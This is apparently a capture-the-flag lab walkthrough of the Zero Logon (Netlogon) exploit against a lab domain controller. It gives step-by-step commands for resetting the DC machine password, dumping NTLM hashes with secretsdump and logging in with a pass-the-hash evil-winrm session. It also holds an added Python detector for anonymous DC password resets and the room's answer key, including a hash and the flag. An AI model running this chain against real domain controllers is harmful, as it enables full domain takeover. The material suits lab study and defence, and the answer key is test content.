Zero Logon - Hard
-
This room covers the walkthrough for the Zero Logon exploit, which abuses an MS-NRPC (Microsoft Netlogon Remote Protocol) feature.
-
We use the proof of concept and the modified script for this exploit.
python3 -m pip install virtualenv
python3 -m virtualenv impacketEnv
source impacketEnv/bin/activate
pip install git+https://github.com/SecureAuthCorp/impacket
#setting up impacket in virtualenv
nmap -T4 -A 10.10.187.79
#scan machine to get netbios name
#now we can use the zerologon.py script
python3 zerologon.py
#show syntax
python3 zerologon.py DC01 10.10.187.79
#exploits zero logon, changes password
secretsdump.py -just-dc-ntlm -no-pass DC01\$@10.10.187.79
#dumps hashes given domain controller and IP
#we can use admin hash to connect
evil-winrm -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568 -i 10.10.187.79
#get access
cd ..\Desktop
type root.txt
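The exploit above ends with the DC machine account's password being reset by an unauthenticated caller, so on the defender's side the thing to look for is a Security event 4742 ("A computer account was changed") on a domain controller account whose Subject is ANONYMOUS LOGON (SID S-1-5-7) and whose Password Last Set field actually changed. The following is an added example, not code from the room or from the scripts used above; it assumes a flattened key=value log export format and a DC_ACCOUNTS list that a defender would fill from their own environment (DC01 comes from the room), and the sample log lines are constructed.

```python
import shlex

ANONYMOUS_LOGON_SID = "S-1-5-7"     # well-known SID for ANONYMOUS LOGON
COMPUTER_ACCOUNT_CHANGED = "4742"   # Security event: "A computer account was changed"

# Domain controller machine accounts to watch. DC01 is the room's DC; the
# set itself is an assumption a defender fills from their own environment.
DC_ACCOUNTS = {"DC01$"}

# Constructed sample export (not real logs from the room). Line 3 is what a
# Zerologon reset of the DC account looks like: the change is made by
# ANONYMOUS LOGON rather than by the computer account itself (line 4).
SAMPLE_LOG = """\
EventID=4742 SubjectUserSid=S-1-5-21-1111-2222-3333-1000 SubjectUserName=DC01$ TargetUserName=WS07$ PasswordLastSet="9/17/2020 9:58:02 AM"
EventID=4624 SubjectUserSid=S-1-5-7 SubjectUserName="ANONYMOUS LOGON" LogonType=3 TargetUserName=DC01$
EventID=4742 SubjectUserSid=S-1-5-7 SubjectUserName="ANONYMOUS LOGON" TargetUserName=DC01$ PasswordLastSet="9/17/2020 10:03:11 AM"
EventID=4742 SubjectUserSid=S-1-5-21-1111-2222-3333-1000 SubjectUserName=DC01$ TargetUserName=DC01$ PasswordLastSet="9/17/2020 10:30:00 AM"
"""

def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    fields = {}
    for token in shlex.split(line):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields

def is_zerologon_reset(event: dict) -> bool:
    """4742 on a DC account, done by ANONYMOUS LOGON, with the password field
    actually changed ('-' in a 4742 means the attribute was not modified)."""
    return (
        event.get("EventID") == COMPUTER_ACCOUNT_CHANGED
        and event.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
        and event.get("TargetUserName") in DC_ACCOUNTS
        and event.get("PasswordLastSet", "-") != "-"
    )

def find_zerologon_resets(log_text: str) -> list:
    """Return (line_number, target_account, password_last_set) for each hit."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        event = parse_event(line)
        if is_zerologon_reset(event):
            hits.append((number, event["TargetUserName"], event["PasswordLastSet"]))
    return hits

if __name__ == "__main__":
    for number, account, when in find_zerologon_resets(SAMPLE_LOG):
        print(f"line {number}: {account} password reset by ANONYMOUS LOGON at {when}")
```

Legitimate machine-account password rotations are initiated by the computer account itself (Subject DC01$), never by ANONYMOUS LOGON, which is why the subject SID rather than the target account is the discriminating field.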
-
What method will allow us to change passwords over NRPC? - NetrServerPasswordSet2()
-
What are the required fields for the method per the Microsoft Documentation? - PrimaryName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, ClearNewPassword
-
What Opnumber is the method? - 30
-
What is the NetBIOS name of the Domain Controller? - DC01
-
What is the NetBIOS name of the network? - hololive
-
What domain are you attacking? - hololive.local
-
What is the Local Administrator's NTLM hash? - 3f3ef89114fb063e3d7fc23c20f65568
-
How many Domain Admin accounts are there? - 2
-
What is the root flag? - THM{Zer0Log0nD4rkTh1rty}